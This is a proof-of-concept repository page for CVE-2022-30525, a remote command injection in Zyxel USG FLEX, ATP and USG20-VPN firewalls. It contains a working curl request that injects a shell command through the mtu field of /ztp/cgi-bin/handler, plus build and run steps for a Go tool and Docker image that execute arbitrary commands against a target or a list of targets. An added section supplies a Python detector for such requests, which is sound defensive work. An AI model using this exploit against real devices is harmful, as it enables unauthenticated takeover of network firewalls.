
CVE-2022-30525 PoC — Zyxel USG FLEX OS command injection vulnerability

Associated Vulnerability
Title: Zyxel USG FLEX OS command injection vulnerability (CVE-2022-30525)
Description: An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
Description: Initial POC for CVE-2022-30525
Readme
# CVE-2022-30525 by 1vere$k
**Rapid7** discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the nobody user on the affected device.

The following table contains the affected models and firmware versions.

| Affected Model | Affected Firmware Version |
|---|---|
| USG FLEX 100, 100W, 200, 500, 700 | ZLD5.00 thru ZLD5.21 Patch 1 |
| USG20-VPN, USG20W-VPN | ZLD5.10 thru ZLD5.21 Patch 1 |
| ATP 100, 200, 500, 700, 800 | ZLD5.10 thru ZLD5.21 Patch 1 |

The VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.

The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the `nobody` user. This vulnerability is exploited through the `/ztp/cgi-bin/handler` URI.

## Curl Example
```
curl -v --insecure -X POST -H "Content-Type: application/json" \
  -d '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}' \
  https://192.168.1.1/ztp/cgi-bin/handler
```
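The request above is also what a defender should be hunting for: a POST to `/ztp/cgi-bin/handler` whose numeric provisioning fields (`port`, `vlanid`, `mtu`, `vlan_tagged`) carry something other than digits, or whose string fields contain shell metacharacters. The following detector is an added example and is not part of the PoC repository. It assumes a constructed tab-separated record format (`METHOD<TAB>PATH<TAB>BODY`) such as a reverse proxy or WAF that logs request bodies would emit; a plain web-server access log does not contain bodies, so the body source is an assumption. It goes slightly beyond the page by flagging metacharacters in any string field, not only `mtu`.

```python
import json
import re
from dataclasses import dataclass

# Endpoint the README names as the injection path.
ZTP_HANDLER_PATH = "/ztp/cgi-bin/handler"

# Shell metacharacters that a legitimate ZTP provisioning value never needs.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r]")

# Fields the README's request shows as plain integers; anything else in them is suspect.
NUMERIC_FIELDS = ("port", "vlanid", "mtu", "vlan_tagged")


@dataclass
class Finding:
    line_no: int
    reason: str
    field: str
    value: str


def inspect_body(body: str):
    """Yield (reason, field, value) for every suspicious field in one JSON request body."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        yield ("unparseable-json", "", body[:60])
        return
    if not isinstance(doc, dict):
        yield ("non-object-body", "", body[:60])
        return
    for field, value in doc.items():
        if not isinstance(value, str):
            continue
        if field in NUMERIC_FIELDS and not value.isdigit():
            # A numeric field holding non-digits is the exact shape of the README's payload.
            yield ("non-numeric-value", field, value)
        elif SHELL_META.search(value):
            yield ("shell-metacharacter", field, value)


def parse_record(line: str):
    """Split a 'METHOD<TAB>PATH<TAB>BODY' record (assumed log format); None if malformed."""
    parts = line.rstrip("\n").split("\t", 2)
    if len(parts) != 3:
        return None
    return parts[0], parts[1], parts[2]


def scan_log(lines):
    """Return Findings for POSTs to the ZTP handler whose bodies look like injection attempts."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        rec = parse_record(line)
        if rec is None:
            continue
        method, path, body = rec
        # Only the ZTP handler is in scope; strip any query string before comparing.
        if method != "POST" or path.split("?", 1)[0] != ZTP_HANDLER_PATH:
            continue
        for reason, field, value in inspect_body(body):
            findings.append(Finding(line_no, reason, field, value))
    return findings


# Constructed sample records (not real traffic): method, path and JSON body, tab-separated.
SAMPLE_LOG = [
    'POST\t/ztp/cgi-bin/handler\t{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"1500","data":"hi"}',
    'POST\t/ztp/cgi-bin/handler\t{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}',
    'POST\t/ztp/cgi-bin/handler\t{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"1500","data":"a|b"}',
    'GET\t/ztp/cgi-bin/handler\t',
    'POST\t/api/other\t{"mtu":"; x"}',
    'POST\t/ztp/cgi-bin/handler\t{not json',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason} field={f.field!r} value={f.value!r}")
```

On the constructed sample, lines 2, 3 and 6 are reported (non-numeric `mtu`, a metacharacter in `data`, and an unparseable body); the clean provisioning request, the GET, and the POST to an unrelated path are ignored. Alerting on the unparseable body is deliberate: malformed JSON aimed at this handler is worth a look even when no metacharacter survives parsing.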

## Usage

There should be a `cmds` file created where you can add commands to be executed via the program in the following format:
```
bash -c "command#1 && command#2 && etc."

For example:
bash -c "ping 8.8.8.8"
```

**Golang**
```
1. git clone https://github.com/iveresk/cve-2022-30525.git
2. cd cve-2022-30525
3. go build -o cve-2022-30525 cve-2022-30525.go
4. chmod +x cve-2022-30525
5. ./cve-2022-30525 -t <targetURL> [or <targetFile>]
```

**Dockerfile**
```
docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525
```
`INPUT_FILE` is either a target URL or a file containing a list of targets.

## Contact
You are free to contact me via [Keybase](https://keybase.io/1veresk) for any details. 